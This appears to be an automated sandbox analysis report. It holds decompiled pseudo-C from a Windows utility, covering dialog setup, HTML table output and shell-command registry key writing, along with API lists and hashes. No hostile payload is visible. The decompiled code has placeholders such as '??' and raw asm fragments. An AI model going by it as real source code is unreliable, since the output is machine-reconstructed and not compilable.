                                                                                                  				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                  				 *_t124 = 0x3ea;
                                                                                                  				E0040AD85(GetDlgItem(??, ??));
                                                                                                  				 *_t124 = 0x3f1;
                                                                                                  				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                  				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                  				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                  				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                  				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                  				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                  				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                  				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                  				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                  				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                  				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                  				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                  				_t134 = _t124 + 0x78;
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                  				_t119 = 1;
                                                                                                  				do {
                                                                                                  					_t17 = _t119 + 0x280; // 0x281
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t119 = _t119 + 1;
                                                                                                  				} while (_t119 <= 9);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                  				_t121 = 1;
                                                                                                  				do {
                                                                                                  					_t21 = _t121 + 0x294; // 0x295
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t121 = _t121 + 1;
                                                                                                  				} while (_t121 <= 3);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                  				_t122 = 0;
                                                                                                  				do {
                                                                                                  					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t122 = _t122 + 1;
                                                                                                  				} while (_t122 <= 0xd);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                  				_t123 = 0;
                                                                                                  				do {
                                                                                                  					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t123 = _t123 + 1;
                                                                                                  					_t143 = _t123 - 3;
                                                                                                  				} while (_t123 < 3);
                                                                                                  				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                  				E00403EC3(GetDlgItem, _t113);
                                                                                                  				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                  				_t88 = E00402D78(_t113, _t143);
                                                                                                  				E00402BEE(_t113);
                                                                                                  				return _t88;
                                                                                                  			}
















                                                                                                  0x00403c09
                                                                                                  0x00403c0c
                                                                                                  0x00403c11
                                                                                                  0x00403c1b
                                                                                                  0x00403c3f
                                                                                                  0x00403c4a
                                                                                                  0x00403c6e
                                                                                                  0x00403c96
                                                                                                  0x00403c9a
                                                                                                  0x00403ca6
                                                                                                  0x00403cb3
                                                                                                  0x00403cb8
                                                                                                  0x00403cc5
                                                                                                  0x00403cca
                                                                                                  0x00403cdd
                                                                                                  0x00403ce6
                                                                                                  0x00403cf8
                                                                                                  0x00403d11
                                                                                                  0x00403d26
                                                                                                  0x00403d3f
                                                                                                  0x00403d54
                                                                                                  0x00403d6d
                                                                                                  0x00403d76
                                                                                                  0x00403d88
                                                                                                  0x00403d9e
                                                                                                  0x00403db0
                                                                                                  0x00403db5
                                                                                                  0x00403dc4
                                                                                                  0x00403dc8
                                                                                                  0x00403dc9
                                                                                                  0x00403dca
                                                                                                  0x00403dda
                                                                                                  0x00403ddf
                                                                                                  0x00403de2
                                                                                                  0x00403de3
                                                                                                  0x00403df4
                                                                                                  0x00403df8
                                                                                                  0x00403df9
                                                                                                  0x00403dfa
                                                                                                  0x00403e0a
                                                                                                  0x00403e0f
                                                                                                  0x00403e12
                                                                                                  0x00403e13
                                                                                                  0x00403e22
                                                                                                  0x00403e26
                                                                                                  0x00403e28
                                                                                                  0x00403e29
                                                                                                  0x00403e39
                                                                                                  0x00403e3e
                                                                                                  0x00403e41
                                                                                                  0x00403e42
                                                                                                  0x00403e51
                                                                                                  0x00403e55
                                                                                                  0x00403e57
                                                                                                  0x00403e58
                                                                                                  0x00403e68
                                                                                                  0x00403e6d
                                                                                                  0x00403e70
                                                                                                  0x00403e71
                                                                                                  0x00403e71
                                                                                                  0x00403e87
                                                                                                  0x00403e8d
                                                                                                  0x00403e9e
                                                                                                  0x00403ea6
                                                                                                  0x00403eaf
                                                                                                  0x00403ebc

                                                                                                  APIs
                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1038210931-0
                                                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed int _v28;
                                                                                                  				signed int _v32;
                                                                                                  				void _v138;
                                                                                                  				long _v140;
                                                                                                  				void _v242;
                                                                                                  				char _v244;
                                                                                                  				void _v346;
                                                                                                  				char _v348;
                                                                                                  				void _v452;
                                                                                                  				void _v962;
                                                                                                  				signed short _v964;
                                                                                                  				void* __esi;
                                                                                                  				void* _t87;
                                                                                                  				wchar_t* _t109;
                                                                                                  				intOrPtr* _t124;
                                                                                                  				signed int _t125;
                                                                                                  				signed int _t140;
                                                                                                  				signed int _t153;
                                                                                                  				intOrPtr* _t154;
                                                                                                  				signed int _t156;
                                                                                                  				signed int _t157;
                                                                                                  				void* _t159;
                                                                                                  				void* _t161;
                                                                                                  
                                                                                                  				_t124 = __ebx;
                                                                                                  				_v964 = _v964 & 0x00000000;
                                                                                                  				memset( &_v962, 0, 0x1fc);
                                                                                                  				_t125 = 0x18;
                                                                                                  				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                  				asm("movsw");
                                                                                                  				_t153 = 0;
                                                                                                  				_v244 = 0;
                                                                                                  				memset( &_v242, 0, 0x62);
                                                                                                  				_v348 = 0;
                                                                                                  				memset( &_v346, 0, 0x62);
                                                                                                  				_v140 = 0;
                                                                                                  				memset( &_v138, 0, 0x62);
                                                                                                  				_t161 = _t159 + 0x3c;
                                                                                                  				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                  				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                  				if(_t87 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_t87,  &_v964));
                                                                                                  					_push(L" bgcolor=\"%s\"");
                                                                                                  					_push(0x32);
                                                                                                  					_push( &_v244);
                                                                                                  					L0040B1EC();
                                                                                                  					_t161 = _t161 + 0x18;
                                                                                                  				}
                                                                                                  				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                  				_v8 = _t153;
                                                                                                  				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                  					while(1) {
                                                                                                  						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                  						_v12 = _t156;
                                                                                                  						_t157 = _t156 * 0x14;
                                                                                                  						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                  							wcscpy( &_v140, L" nowrap");
                                                                                                  						}
                                                                                                  						_v32 = _v32 | 0xffffffff;
                                                                                                  						_v28 = _v28 | 0xffffffff;
                                                                                                  						_v24 = _v24 | 0xffffffff;
                                                                                                  						_v20 = _t153;
                                                                                                  						_t154 = _a8;
                                                                                                  						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                  						E0040ADC0(_v32,  &_v348);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                  						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                  						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                  							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                  						} else {
                                                                                                  							_push( *(_t157 + _v16 + 0x10));
                                                                                                  							_push(E0040ADC0(_t106,  &_v964));
                                                                                                  							_push(L"<font color=\"%s\">%s</font>");
                                                                                                  							_push(0x2000);
                                                                                                  							_push( *(_t124 + 0x68));
                                                                                                  							L0040B1EC();
                                                                                                  							_t161 = _t161 + 0x14;
                                                                                                  						}
                                                                                                  						_t109 =  *(_t124 + 0x64);
                                                                                                  						_t140 =  *_t109 & 0x0000ffff;
                                                                                                  						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                  							wcscat(_t109, L"&nbsp;");
                                                                                                  						}
                                                                                                  						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                  						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                  						_push( &_v140);
                                                                                                  						_push( &_v348);
                                                                                                  						_push( *(_t124 + 0x68));
                                                                                                  						_push( &_v244);
                                                                                                  						_push( &_v452);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t161 = _t161 + 0x28;
                                                                                                  						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                  							goto L14;
                                                                                                  						}
                                                                                                  						_t153 = 0;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L14:
                                                                                                  				E00407343(_t124, _a4, L"</table><p>");
                                                                                                  				return E00407343(_t124, _a4, L"\r\n");
                                                                                                  			}































                                                                                                  0x00407763
                                                                                                  0x0040776c
                                                                                                  0x00407784
                                                                                                  0x0040778b
                                                                                                  0x00407797
                                                                                                  0x00407799
                                                                                                  0x0040779b
                                                                                                  0x004077a7
                                                                                                  0x004077ae
                                                                                                  0x004077bd
                                                                                                  0x004077c4
                                                                                                  0x004077d3
                                                                                                  0x004077da
                                                                                                  0x004077e1
                                                                                                  0x004077e6
                                                                                                  0x004077f2
                                                                                                  0x004077f5
                                                                                                  0x00407804
                                                                                                  0x00407805
                                                                                                  0x00407810
                                                                                                  0x00407812
                                                                                                  0x00407813
                                                                                                  0x00407818
                                                                                                  0x00407818
                                                                                                  0x00407825
                                                                                                  0x0040782d
                                                                                                  0x00407830
                                                                                                  0x0040783a
                                                                                                  0x00407840
                                                                                                  0x00407846
                                                                                                  0x00407849
                                                                                                  0x00407850
                                                                                                  0x0040785e
                                                                                                  0x00407864
                                                                                                  0x00407867
                                                                                                  0x0040786b
                                                                                                  0x0040786f
                                                                                                  0x00407877
                                                                                                  0x0040787a
                                                                                                  0x00407885
                                                                                                  0x00407892
                                                                                                  0x004078a8
                                                                                                  0x004078b8
                                                                                                  0x004078c5
                                                                                                  0x004078ff
                                                                                                  0x004078c7
                                                                                                  0x004078ca
                                                                                                  0x004078dd
                                                                                                  0x004078de
                                                                                                  0x004078e3
                                                                                                  0x004078e8
                                                                                                  0x004078eb
                                                                                                  0x004078f0
                                                                                                  0x004078f0
                                                                                                  0x00407906
                                                                                                  0x00407909
                                                                                                  0x0040790f
                                                                                                  0x0040791d
                                                                                                  0x00407923
                                                                                                  0x0040792d
                                                                                                  0x00407932
                                                                                                  0x0040793b
                                                                                                  0x00407942
                                                                                                  0x00407943
                                                                                                  0x0040794c
                                                                                                  0x00407953
                                                                                                  0x00407954
                                                                                                  0x00407959
                                                                                                  0x0040795c
                                                                                                  0x00407961
                                                                                                  0x0040796c
                                                                                                  0x00407971
                                                                                                  0x0040797a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00407838
                                                                                                  0x00407838
                                                                                                  0x0040783a
                                                                                                  0x00407980
                                                                                                  0x0040798a
                                                                                                  0x004079a1

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                  • API String ID: 1607361635-601624466
                                                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 40%
                                                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				long _v1028;
                                                                                                  				void _v1538;
                                                                                                  				char _v1540;
                                                                                                  				void _v2050;
                                                                                                  				char _v2052;
                                                                                                  				char _v2564;
                                                                                                  				char _v35332;
                                                                                                  				char _t51;
                                                                                                  				intOrPtr* _t54;
                                                                                                  				void* _t61;
                                                                                                  				intOrPtr* _t73;
                                                                                                  				void* _t78;
                                                                                                  				void* _t79;
                                                                                                  				void* _t80;
                                                                                                  				void* _t81;
                                                                                                  
                                                                                                  				E0040B550(0x8a00, __ecx);
                                                                                                  				_v2052 = 0;
                                                                                                  				memset( &_v2050, 0, 0x1fc);
                                                                                                  				_v1540 = 0;
                                                                                                  				memset( &_v1538, 0, 0x1fc);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t79 = _t78 + 0x24;
                                                                                                  				if(_a20 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                  					_push(L" bgcolor=\"%s\"");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v2052);
                                                                                                  					L0040B1EC();
                                                                                                  					_t79 = _t79 + 0x18;
                                                                                                  				}
                                                                                                  				if(_a24 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                  					_push(L"<font color=\"%s\">");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v1540);
                                                                                                  					L0040B1EC();
                                                                                                  					wcscpy( &_v1028, L"</font>");
                                                                                                  					_t79 = _t79 + 0x20;
                                                                                                  				}
                                                                                                  				_push( &_v2052);
                                                                                                  				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                  				_push(0x3fff);
                                                                                                  				_push( &_v35332);
                                                                                                  				L0040B1EC();
                                                                                                  				_t80 = _t79 + 0x10;
                                                                                                  				E00407343(_a4, _a8,  &_v35332);
                                                                                                  				_t51 = _a16;
                                                                                                  				if(_t51 > 0) {
                                                                                                  					_t73 = _a12 + 4;
                                                                                                  					_a20 = _t51;
                                                                                                  					do {
                                                                                                  						_v516 = 0;
                                                                                                  						memset( &_v514, 0, 0x1fc);
                                                                                                  						_t54 =  *_t73;
                                                                                                  						_t81 = _t80 + 0xc;
                                                                                                  						if( *_t54 == 0) {
                                                                                                  							_v516 = 0;
                                                                                                  						} else {
                                                                                                  							_push(_t54);
                                                                                                  							_push(L" width=\"%s\"");
                                                                                                  							_push(0xff);
                                                                                                  							_push( &_v516);
                                                                                                  							L0040B1EC();
                                                                                                  							_t81 = _t81 + 0x10;
                                                                                                  						}
                                                                                                  						_push( &_v1028);
                                                                                                  						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                  						_push( &_v1540);
                                                                                                  						_push( &_v516);
                                                                                                  						_push(L"<th%s>%s%s%s\r\n");
                                                                                                  						_push(0x3fff);
                                                                                                  						_push( &_v35332);
                                                                                                  						L0040B1EC();
                                                                                                  						_t80 = _t81 + 0x1c;
                                                                                                  						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                  						_t73 = _t73 + 8;
                                                                                                  						_t36 =  &_a20;
                                                                                                  						 *_t36 = _a20 - 1;
                                                                                                  					} while ( *_t36 != 0);
                                                                                                  					return _t61;
                                                                                                  				}
                                                                                                  				return _t51;
                                                                                                  			}





















                                                                                                  0x00407b65
                                                                                                  0x00407b7c
                                                                                                  0x00407b83
                                                                                                  0x00407b91
                                                                                                  0x00407b98
                                                                                                  0x00407ba6
                                                                                                  0x00407bad
                                                                                                  0x00407bb2
                                                                                                  0x00407bb9
                                                                                                  0x00407bca
                                                                                                  0x00407bcb
                                                                                                  0x00407bd6
                                                                                                  0x00407bdb
                                                                                                  0x00407bdc
                                                                                                  0x00407be1
                                                                                                  0x00407be1
                                                                                                  0x00407be8
                                                                                                  0x00407bf9
                                                                                                  0x00407bfa
                                                                                                  0x00407c05
                                                                                                  0x00407c0a
                                                                                                  0x00407c0b
                                                                                                  0x00407c1c
                                                                                                  0x00407c21
                                                                                                  0x00407c21
                                                                                                  0x00407c2a
                                                                                                  0x00407c2b
                                                                                                  0x00407c36
                                                                                                  0x00407c3b
                                                                                                  0x00407c3c
                                                                                                  0x00407c41
                                                                                                  0x00407c51
                                                                                                  0x00407c56
                                                                                                  0x00407c5b
                                                                                                  0x00407c65
                                                                                                  0x00407c68
                                                                                                  0x00407c6b
                                                                                                  0x00407c74
                                                                                                  0x00407c7b
                                                                                                  0x00407c80
                                                                                                  0x00407c82
                                                                                                  0x00407c88
                                                                                                  0x00407ca6
                                                                                                  0x00407c8a
                                                                                                  0x00407c8a
                                                                                                  0x00407c8b
                                                                                                  0x00407c96
                                                                                                  0x00407c9b
                                                                                                  0x00407c9c
                                                                                                  0x00407ca1
                                                                                                  0x00407ca1
                                                                                                  0x00407cb3
                                                                                                  0x00407cb4
                                                                                                  0x00407cbd
                                                                                                  0x00407cc4
                                                                                                  0x00407cc5
                                                                                                  0x00407cd0
                                                                                                  0x00407cd5
                                                                                                  0x00407cd6
                                                                                                  0x00407cdb
                                                                                                  0x00407ceb
                                                                                                  0x00407cf0
                                                                                                  0x00407cf3
                                                                                                  0x00407cf3
                                                                                                  0x00407cf3
                                                                                                  0x00000000
                                                                                                  0x00407cfc
                                                                                                  0x00407d00

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				short _v32;
                                                                                                  				void _v2078;
                                                                                                  				signed int _v2080;
                                                                                                  				void _v4126;
                                                                                                  				char _v4128;
                                                                                                  				void _v6174;
                                                                                                  				char _v6176;
                                                                                                  				void _v8222;
                                                                                                  				char _v8224;
                                                                                                  				signed int _t49;
                                                                                                  				short _t55;
                                                                                                  				intOrPtr _t56;
                                                                                                  				int _t73;
                                                                                                  				intOrPtr _t78;
                                                                                                  
                                                                                                  				_t76 = __ecx;
                                                                                                  				E0040B550(0x201c, __ecx);
                                                                                                  				_t73 = 0;
                                                                                                  				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                  					L6:
                                                                                                  					return _t73;
                                                                                                  				}
                                                                                                  				_v6176 = 0;
                                                                                                  				memset( &_v6174, 0, 0x7fe);
                                                                                                  				_t78 = _a4;
                                                                                                  				_push(_t78 + 0x20a);
                                                                                                  				_push(_t78);
                                                                                                  				_push(L"%s\\shell\\%s\\command");
                                                                                                  				_push(0x3ff);
                                                                                                  				_push( &_v6176);
                                                                                                  				L0040B1EC();
                                                                                                  				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                  					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                  					asm("sbb ebx, ebx");
                                                                                                  					_t73 =  ~_t49 + 1;
                                                                                                  					RegCloseKey(_v12);
                                                                                                  					_v2080 = _v2080 & 0x00000000;
                                                                                                  					memset( &_v2078, 0, 0x7fe);
                                                                                                  					E00404AD9( &_v2080);
                                                                                                  					if(_v2078 == 0x3a) {
                                                                                                  						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                  						_v32 = _t55;
                                                                                                  						_t56 =  *0x40ccdc; // 0x5c
                                                                                                  						_v28 = _t56;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						_v32 = _v2080;
                                                                                                  						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                  							_v4128 = 0;
                                                                                                  							memset( &_v4126, 0, 0x7fe);
                                                                                                  							_v8224 = 0;
                                                                                                  							memset( &_v8222, 0, 0x7fe);
                                                                                                  							_push(_a4 + 0x20a);
                                                                                                  							_push(_a4);
                                                                                                  							_push(L"%s\\shell\\%s");
                                                                                                  							_push(0x3ff);
                                                                                                  							_push( &_v8224);
                                                                                                  							L0040B1EC();
                                                                                                  							_push( &_v2080);
                                                                                                  							_push(L"\"%s\",0");
                                                                                                  							_push(0x3ff);
                                                                                                  							_push( &_v4128);
                                                                                                  							L0040B1EC();
                                                                                                  							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				RegCloseKey(_v8);
                                                                                                  				goto L6;
                                                                                                  			}





















                                                                                                  0x00404415
                                                                                                  0x0040441d
                                                                                                  0x0040442c
                                                                                                  0x00404435
                                                                                                  0x004045b3
                                                                                                  0x004045b7
                                                                                                  0x004045b7
                                                                                                  0x0040444b
                                                                                                  0x00404452
                                                                                                  0x00404457
                                                                                                  0x00404460
                                                                                                  0x00404461
                                                                                                  0x00404462
                                                                                                  0x0040446d
                                                                                                  0x00404472
                                                                                                  0x00404473
                                                                                                  0x00404490
                                                                                                  0x004044a5
                                                                                                  0x004044b4
                                                                                                  0x004044b6
                                                                                                  0x004044b7
                                                                                                  0x004044bd
                                                                                                  0x004044cf
                                                                                                  0x004044db
                                                                                                  0x004044eb
                                                                                                  0x004044f1
                                                                                                  0x004044f6
                                                                                                  0x004044f9
                                                                                                  0x004044fe
                                                                                                  0x00404506
                                                                                                  0x00404507
                                                                                                  0x00404508
                                                                                                  0x00404510
                                                                                                  0x00404521
                                                                                                  0x00404532
                                                                                                  0x00404539
